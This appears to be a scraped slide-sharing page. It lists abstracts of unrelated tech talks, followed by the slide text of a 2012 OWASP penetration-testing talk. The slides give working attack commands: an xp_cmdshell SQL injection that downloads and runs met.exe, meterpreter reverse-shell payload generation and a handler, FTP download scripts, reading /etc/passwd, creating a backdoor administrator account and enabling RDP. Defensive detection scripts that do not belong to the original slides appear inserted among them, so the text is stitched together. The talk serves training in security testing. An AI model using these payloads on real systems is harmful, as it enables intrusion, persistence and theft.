This talk is about how to solve the practical challenges faced during pen-testing and exploitation. It will help you understand how this can be done efficiently and will explore various tips and tricks. It will try to answer common questions like:
0. How do I prepare? What kind of tools should I have?
1. How do I scan the entire network faster?
2. How can I get more accurate results for scanning and fingerprinting?
3. Nessus says it is vulnerable, but how can I exploit it?
4. What if I know it is vulnerable but I don’t have any exploits available?
5. I am inside the box and have compromised it. Now what?
In short, it will show you the pain points of a typical pen-testing exercise and how to deal with them, and will help you reach “42”, the answer to life, the universe and everything.
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik (CODE BLUE)
The boom of AI brought to the market a set of impressive solutions both on the hardware and software side. On the other hand, massive implementation of AI in various areas brings about problems, and security is one of the greatest concerns.
In this talk we will present results of hands-on vulnerability research of different components of AI infrastructure including NVIDIA DGX GPU servers, ML frameworks such as Pytorch, Keras and Tensorflow, data processing pipelines and specific applications, including Medical Imaging and face recognition powered CCTV. Updated Internet Census toolkit based on the Grinder framework will be introduced.
Escape the defaults - Configure Sling like AEM as a Cloud Service (Robert Munteanu)
AEM as a Cloud Service is using the same battle-tested core of Sling, Felix and Jackrabbit Oak that you are used to. Many of the large-scale architectural changes, such as container-based deployments, separation of code and content, horizontal and vertical scaling, etc, are made possible by a host of reimplementations of APIs exposed by the open-source projects that serve as the foundation of AEM.
In this talk we will explore a number of such extensions and their implications, such as Oak's principal-based authorization, getting up and running with the composite node store, or indexing in a separation of content and apps scenario.
After this talk participants will have a better understanding of various under-the-hood changes present in AEM as a Cloud Service and their practical implications for AEM development. They will also be able to set up their own tweaked Sling instance so they can experiment with such a setup.
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019] (David Buck)
With the recent open-sourcing of JDK Mission Control, there is even more interest in Java Mission Control and Java Flight Recorder than ever. A lot has changed, but these tools still remain on the forefront of debugging and troubleshooting Java issues, both during development and in production. This session covers these recent changes, migrating from earlier versions, and what the JDK Mission Control community’s plans are for the future.
Recently, sophisticated targeted attacks (APT) using drive-by downloads have become increasingly common. Existing automated analysis systems are generally unable to analyze the malware used in APT attacks, and malware researchers are forced to analyze it manually. The speaker will present a new real-time automated memory analysis system (Malware Analyst). This system does not generate a memory dump using LibVMI; instead it accesses memory directly to speed up diagnosis, and it clearly recognizes suspicious malware behavior.
Introducing Intelligence Into Your Malware Analysis (Brian Baskin)
With malware becoming more prevalent, and the pool of capable reversers falling short of overall need, there is a greater need to provide quick and efficient malware analysis for network defense. While many analysts have a grasp on how to appropriately reverse malware, there is large room for improvement by extracting critical indicators, correlating on key details, and cataloging artifacts in a way to improve your corporate response for the next attack. This talk will go beyond the basics of malware analysis and focus on critical indicators that analysts should focus on for attribution and better reporting.
Injecting Security into Web Applications at Runtime (Positive Hack Days)
This paper presents the results of research into implementing an algorithm for fixing errors in an application at runtime. The research was conducted on an application with insecure code, with the goal of protecting it from code injection and other web application vulnerabilities. The paper also presents a next-generation web application protection technology called Runtime Application Self-Protection (RASP), which protects against web attacks by working inside the web application. RASP is based on fixing errors at runtime by implicitly "injecting" security into web applications, without additional changes to the code. The talk concludes with a list of the main challenges in implementing this new technology and an overview of the prospects for runtime protection.
Docker on a local machine and Docker in production are two very different things. It's easy to play with a technology, but it's hard to do something real for many customers.
Half a year ago, inside Alpha Laboratory (a division of Alfa-Bank), we started building a new microservices architecture for one of our pilot projects. We almost completely changed the technology stack on the frontend and significantly changed it on the middle layer. For packaging and distribution we have chosen Docker. Two months ago we deployed the project to production and opened the service to clients.
In the report the following topics will be covered:
- reasons for choosing Docker;
- why Docker without other tools is not enough for production;
- what stack of technologies we used in our solution;
- what advantages we've got;
- what problems we faced and how we solved them.
SAP strikes back: Your SAP server now counter attacks. (Dmitry Iudin)
In this presentation, we will demonstrate how attackers can compromise all SAP clients and gain private information from their machines by using the SAP server.
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI... (VISEO)
What’s new in Microsoft ALM 2013, the part that is 100% running on Windows Azure, now called VISUAL STUDIO ONLINE!
by Vincent Thavonekham, Objet Direct
This talk will walk everyone through the concept and practical usage of JavaScript module bundling and optimisation. With the emergence of advanced bundling tools like Webpack, the JavaScript ecosystem has been enriched with the right set of processes and tools required for creating production-ready builds, which is what this talk aims at covering.
This talk will also cover essential differences between task runners and bundlers with focus on advanced optimisation techniques like Tree shaking and Code splitting.
Good practices for debugging Selenium and Appium tests (Abhijeet Vaikar)
We often come across situations when:
> We cannot figure out why our Selenium/Appium scripts fail during execution, either locally or on CI.
> We need to debug scripts locally while writing them but find debugging painful and slow.
Debugging the scripts is often the approach to fixing them. What are the different ways we can do it?
I shared some of the good practices I have used for debugging Selenium and Appium scripts.
Presentation from Cloud Expo Asia Hong Kong covering the rationale for "Compliance as Code" and how InSpec may be applied to servers, cloud platforms, and much more to keep track of your compliance everywhere.
The why and how of moving to PHP 5.5/5.6 (Wim Godden)
With PHP 5.6 out and many production environments still running 5.2 or 5.3, it's time to paint a clear picture on why everyone should move to 5.5 and 5.6 and how to get code ready for the latest version of PHP. In this talk, we'll look at some handy tools and techniques to ease the migration.
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ... (Rosemary Wang)
Thoughtworks Tech Talks NYC, 11/30
We built an application or a platform! However, we soon realize that it is t-minus two weeks before release and we have no way of supporting it when it goes to production. Operations has not been trained, no one will know if a component goes down, and somehow the pipeline used in testing does not work in production. Oops. In this talk, we'll cover ten tips from the operations battlefront to remember as you develop an application or platform. With a focus on operations as a user and designing for support, these tips range from reminders on systems quirks to practices on engaging operations early in the development process. By taking a bit of an "operations" mindset in the development process, we can ease the release process and move closer to DevOps culture.
ROCm and Distributed Deep Learning on Spark and TensorFlow (Databricks)
ROCm, the Radeon Open Ecosystem, is an open-source software foundation for GPU computing on Linux. ROCm supports TensorFlow and PyTorch using MIOpen, a library of highly optimized GPU routines for deep learning. In this talk, we describe how Apache Spark is a key enabling platform for distributed deep learning on ROCm, as it enables different deep learning frameworks to be embedded in Spark workflows in a secure end-to-end machine learning pipeline. We will analyse the different frameworks for integrating Spark with Tensorflow on ROCm, from Horovod to HopsML to Databrick's Project Hydrogen. We will also examine the surprising places where bottlenecks can surface when training models (everything from object stores to the Data Scientists themselves), and we will investigate ways to get around these bottlenecks. The talk will include a live demonstration of training and inference for a Tensorflow application embedded in a Spark pipeline written in a Jupyter notebook on Hopsworks with ROCm.
The Metaverse and AI: how can decision-makers harness the Metaverse for their... (Jen Stirrup)
The Metaverse is popularized in science fiction, and now it is becoming closer to being a part of our daily lives through the use of social media and shopping companies. How can businesses survive in a world where Artificial Intelligence is becoming the present as well as the future of technology, and how does the Metaverse fit into business strategy when futurist ideas are developing into reality at accelerated rates? How do we do this when our data isn't up to scratch? How can we move towards success with our data so we are set up for the Metaverse when it arrives?
How can you help your company evolve, adapt, and succeed using Artificial Intelligence and the Metaverse to stay ahead of the competition? What are the potential issues, complications, and benefits that these technologies could bring to us and our organizations? In this session, Jen Stirrup will explain how to start thinking about these technologies as an organisation.
Essentials of Automations: The Art of Triggers and Actions in FME (Safe Software)
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf (Peter Spielvogel)
Building better applications for business users with SAP Fiori.
• What is SAP Fiori and why it matters to you
• How a better user experience drives measurable business benefits
• How to get started with SAP Fiori today
• How SAP Fiori elements accelerates application development
• How SAP Build Code includes SAP Fiori tools and other generative artificial intelligence capabilities
• How SAP Fiori paves the way for using AI in SAP apps
Climate Impact of Software Testing at Nordic Testing Days (Kari Kakkonen)
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing is discussed in the talk. ICT and testing must carry their part of the global responsibility to help with climate warming. We can minimize the carbon footprint, but we can also have a carbon handprint, a positive impact on the climate. Sustainability can be added to the quality characteristics and then measured continuously. Test environments can be used less, at a smaller scale and on demand. Test techniques can be used to optimize or minimize the number of tests. Test automation can be used to speed up testing.
Transcript: Selling digital books in 2024: Insights from industry leaders - T... (BookNet Canada)
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
A tale of scale & speed: How the US Navy is enabling software delivery from l... (sonjaschweigert1)
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Welcome to the first live UiPath Community Day Dubai! Join us for this unique occasion to meet our local and global UiPath Community and leaders. You will get a full view of the MEA region's automation landscape and the AI Powered automation technology capabilities of UiPath. Also, hosted by our local partners Marc Ellis, you will enjoy a half-day packed with industry insights and automation peers networking.
📕 Curious on our agenda? Wait no more!
10:00 Welcome note - UiPath Community in Dubai
Lovely Sinha, UiPath Community Chapter Leader, UiPath MVPx3, Hyper-automation Consultant, First Abu Dhabi Bank
10:20 A UiPath cross-region MEA overview
Ashraf El Zarka, VP and Managing Director MEA, UiPath
10:35: Customer Success Journey
Deepthi Deepak, Head of Intelligent Automation CoE, First Abu Dhabi Bank
11:15 The UiPath approach to GenAI with our three principles: improve accuracy, supercharge productivity, and automate more
Boris Krumrey, Global VP, Automation Innovation, UiPath
12:15 To discover how Marc Ellis leverages tech-driven solutions in recruitment and managed services.
Brendan Lingam, Director of Sales and Business Development, Marc Ellis
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do... (UiPathCommunity)
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
State of ICS and IoT Cyber Threat Landscape Report 2024 preview (Prayukth K V)
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
The new frontiers of AI in RPA with UiPath Autopilot™ (UiPathCommunity)
In this free online event, organized by the UiPath Italian Community, you can explore the new features of Autopilot, the tool that integrates Artificial Intelligence into the development and use of automations.
📕 Together we will look at some examples of using Autopilot in different tools of the UiPath Suite:
Autopilot for Studio Web
Autopilot for Studio
Autopilot for Apps
Clipboard AI
GenAI applied to Document Understanding
👨🏫👨💻 Speakers:
Stefano Negro, UiPath MVPx3, RPA Tech Lead @ BSP Consultant
Flavio Martinelli, UiPath MVP 2023, Technical Account Manager @UiPath
Andrei Tasca, RPA Solutions Team Lead @NTT Data
Securing your Kubernetes cluster: a step-by-step guide to success! (KatiaHIMEUR1)
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Accelerate your Kubernetes clusters with Varnish Caching (Thijs Feryn)
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Public exploit held private : Penetration Testing the researcher’s way
1. OWASP InfoSec India Conference 2012
August 24th – 25th, 2012, Hotel Crowne Plaza, Gurgaon
The OWASP Foundation, http://www.owasp.org, http://www.owasp.in
Public exploit held private: Penetration Testing the researcher’s way
Tamaghna Basu
GCIH, OSCP, RHCE, CEH, ECSA
tamaghna.basu@gmail.com
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
2. DISCLAIMER!
This presentation contains materials on the evolution of a pen tester, based solely on the perspective of the speaker, which might contradict the opinions of individuals.
All the scenarios explained here are fictional even though they might resemble realistic situations.
Even though no harm is intended, if it causes any discomfort to you spiritually and/or physically, the speaker, organizers, hotel authority, climate control people and the person sitting next to you will not be responsible for that.
3. Setting the context
Why Pentesting?
How do you do it?
To VA or to PT… That’s the question.
4. Setting the context
Terminologies
Vulnerability
Exploit
Payload
Reverse shell
5. Basics
Pentesting
Internal
External
Automated -> review the report -> get the final report
Manual -> run a few basic tools -> get the report done
6. Basics…
Pentesting Steps
Recon and Scanning
Exploit
Maintain Access
Clean up
7. Scanning
Why?
Identify the live hosts
OS fingerprinting
Service fingerprinting
8. Scanning
Desi Jugaad
Ping sweep / shell scripts
Decent tools (But indecent usage)
NMAP (behold the power of NSE)
Others?
9. Desi Jugaad (Local Hack)
Ping Sweep
Windows
FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply"
Linux
#!/bin/bash
for ip in $(seq 1 254); do
ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 &
done
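Seen from the defender's side, a sweep like the two loops above is one source sending ICMP echo requests to many distinct addresses within a few seconds. The detector below is an added example, not part of the original slides; the record format, the 10-second window and the 30-host threshold are assumptions.

```python
from collections import defaultdict, deque

# Constructed sample records: (epoch_seconds, src_ip, dst_ip, icmp_type).
# ICMP type 8 is an echo request, type 0 an echo reply.
def build_sample():
    events = [(1000.0 + i * 0.01, "192.168.15.50", f"192.168.15.{i}", 8)
              for i in range(1, 255)]              # sweep: 254 hosts in about 2.5 s
    events += [(1000.0 + i * 5, "192.168.15.77", "192.168.15.1", 8)
               for i in range(20)]                 # monitoring: one target, repeated
    events.append((1001.0, "192.168.15.1", "192.168.15.77", 0))  # reply, ignored
    return sorted(events)

def find_sweepers(events, window=10.0, min_targets=30):
    """Return {src: peak number of distinct hosts pinged within `window` seconds}
    for every source whose peak reaches `min_targets`."""
    recent = defaultdict(deque)                      # src -> (ts, dst) still in window
    counts = defaultdict(lambda: defaultdict(int))   # src -> dst -> hits in window
    peak = defaultdict(int)
    for ts, src, dst, icmp_type in events:
        if icmp_type != 8:                           # only echo requests count
            continue
        queue = recent[src]
        queue.append((ts, dst))
        counts[src][dst] += 1
        while queue and ts - queue[0][0] > window:   # expire old entries
            _, old_dst = queue.popleft()
            counts[src][old_dst] -= 1
            if counts[src][old_dst] == 0:
                del counts[src][old_dst]
        peak[src] = max(peak[src], len(counts[src]))
    return {src: n for src, n in peak.items() if n >= min_targets}

if __name__ == "__main__":
    for src, n in find_sweepers(build_sample()).items():
        print(f"possible ping sweep from {src}: {n} distinct hosts within 10 s")
```

Counting distinct destinations rather than packets keeps a monitoring host that pings one gateway repeatedly below the threshold.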
10. Scanning
Problem!
It is taking too long to scan, need to go for lunch…
Is it really a Windows box but looks like a Linux box? Or which version?
13. Nmap Scripts
• Shared files and folders
• nmap --script=smb-enum-shares 192.168.80.129
• Check for SMB vulnerabilities
• nmap --script=smb-check-vulns 192.168.80.129
• Scan for machines that use the default MS SQL username and password
• nmap --script=ms-sql-info 192.168.80.129
14. Scanning
I have Nessus. Why go through so much pain?
I don’t have Nessus. What to do?
15. Exploit
Motive
To gain access
Data
Command execution
Destroy everything!
Categories
Service level
OS
16. Exploit
What to exploit?
FTP?
HTTP?
SNMP?
What else?
17. Exploit
FTP
Server Exploit – Buffer Overflow
Fuzzing???
Bruteforce
SNMP
What to do?
18. FTP Tips
Windows
echo open 192.168.12.124 > ftp.txt
echo ftp>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo get met2.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
19. FTP Tips
Linux
echo quote user ftp>> ftp.txt
quote user ftp
echo quote pass ftp>>ftp.txt
echo verbose>>ftp.txt
echo binary >> ftp.txt
echo get exploit.c >> ftp.txt
echo bye >> ftp.txt
cat ftp.txt|ftp -n 192.168.12.124
20. Exploit
HTTP
Server Exploit
Command Execution
Web Shells
SQLi
22. SQLi Tips
' or 1=1;exec master..xp_cmdshell 'echo open
192.168.12.124> ftpmet.txt';exec
master..xp_cmdshell 'echo test>>
ftpmet.txt';exec master..xp_cmdshell 'echo
test>> ftpmet.txt';exec master..xp_cmdshell
'echo bin>> ftpmet.txt';exec
master..xp_cmdshell 'echo get met.exe>>
ftpmet.txt';exec master..xp_cmdshell 'echo
bye';exec master..xp_cmdshell 'ftp -
s:ftpmet.txt';exec master..xp_cmdshell
'met.exe';--
23. SQLi Tips
MySQL non-interactive
mysql --host=127.0.0.1 --user=root --password='password' -e "use mysql; show tables;"
mysql --host=127.0.0.1 --user=root --password='password' -e "SELECT LOAD_FILE('/etc/passwd') INTO dumpfile '/tmp/passwd';"
24. Exploit
Metasploit
Use Exploit
Set payload
exploit
Any other options?
How about writing own exploit (at free time)
(out of scope)
25. L33t love story
Exploit’s love letter to the machine
PAYLOAD…
Which courier?
MSF – set payload
Custom program – msfpayload
Bad characters
Executable - msfpayload
26. Payload Generator
meterpreter msfpayload
options:
./msfpayload windows/meterpreter/reverse_tcp O
Create exe:
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe
Generate shellcode:
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.14.15 LPORT=4321 C
27. From msf:
use exploit/multi/handler
set PAYLOAD
windows/meterpreter/reverse_tcp
set LHOST 192.168.1.40
set LPORT 80
show options
exploit
28. Exploit
I am in, what to do?
Secure access?
Add user
Open a port
I like it the reverse way
meterpreter
Dude, did you get root/admin access?
29. Add User
Windows Shell
net user hacker hacker123 /add
net localgroup administrators hacker /add
Meterpreter
use incognito
add_user hacker hacker123
add_localgroup_user Administrators hacker
RDP enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
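The commands on the FTP, SQLi and Add User slides all leave process-creation records behind, and commands run through xp_cmdshell appear as a shell whose parent is sqlservr.exe. The following detection sketch is an added example, not part of the original slides; the record fields (`parent`, `image`, `cmdline`), the rule labels and the sample events are constructed and assume command-line logging for process creation is enabled.

```python
import re

# Rules derived from the command lines shown on the slides: (label, pattern).
RULES = [
    ("local account created",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I)),
    ("added to Administrators",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+.*/add\b", re.I)),
    ("RDP enabled via registry",
     re.compile(r"\breg(\.exe)?\s+add\b.*fDenyTSConnections.*/d\s+0\b", re.I)),
    ("scripted FTP transfer",
     re.compile(r"\bftp(\.exe)?\s+.*-s:\S+", re.I)),
]
SQL_SHELL = "shell spawned by SQL Server (xp_cmdshell)"
CMD, SQL = r"C:\Windows\System32\cmd.exe", r"C:\MSSQL\Binn\sqlservr.exe"

# Constructed sample events; paths and values are illustrative only.
SAMPLE = [
    {"parent": r"C:\Windows\explorer.exe", "image": CMD, "cmdline": "cmd.exe /c dir"},
    {"parent": SQL, "image": CMD,
     "cmdline": "cmd.exe /c echo open 192.168.12.124> ftpmet.txt"},
    {"parent": SQL, "image": CMD, "cmdline": "cmd.exe /c ftp -s:ftpmet.txt"},
    {"parent": CMD, "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user hacker hacker123 /add"},
    {"parent": CMD, "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net localgroup administrators hacker /add"},
    {"parent": CMD, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control'
                r'\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"parent": CMD, "image": r"C:\Windows\System32\reg.exe",   # benign change
     "cmdline": r'reg add "HKLM\Software\Example" /v Enabled /t REG_DWORD /d 1 /f'},
]

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def classify(event):
    """Return the labels of every rule the event matches."""
    hits = [label for label, rx in RULES if rx.search(event["cmdline"])]
    if basename(event["parent"]) == "sqlservr.exe" and \
            basename(event["image"]) in ("cmd.exe", "powershell.exe"):
        hits.append(SQL_SHELL)
    return hits

def scan(events):
    """Return (index, labels) for each event that matched at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]

if __name__ == "__main__":
    for index, labels in scan(SAMPLE):
        print(index, SAMPLE[index]["cmdline"], "->", ", ".join(labels))
```

The parent-process check catches the xp_cmdshell chain even when the individual `echo` commands look harmless on their own.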
30. Privilege Escalation
Categories
Service level
OS
Problem!
How can I transfer my exploit there?
Netcat
FTP
31. Kernel Exploits
Linux Kernel <= 2.6.36-rc8 http://www.exploit-db.com/exploits/15285/
Linux Kernel 2.4/2.6 http://www.exploit-db.com/exploits/9545/
Linux Kernel 2.6 http://www.exploit-db.com/exploits/8478/
Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 http://www.exploit-db.com/exploits/9844/
32. Windows Exploits
Windows Vista, 7, 2008 http://www.exploit-db.com/exploits/15609/
Windows XP, 2003 http://www.exploit-db.com/exploits/18176/
Linux + NT priv esc http://www.exploit-db.com/exploits/9301/
Windows XP SP2, SP3 http://www.exploit-db.com/exploits/9301/
33. Pivoting…
Huh?
Why do I need it?
How do I do it?
nc + port forwarding
SSH tunneling
34. Fuzzing…
My favorite but last thing I prefer to do on my own
Python rocks!
Basic
Advanced
SEH handler
Egg hunting shellcode
35. Did I miss anything?
Questions
Perspectives
Comments
tamaghna.basu@gmail.com
twitter.com/titanlambda
linkedin.com/in/tamaghnabasu
36. Thank you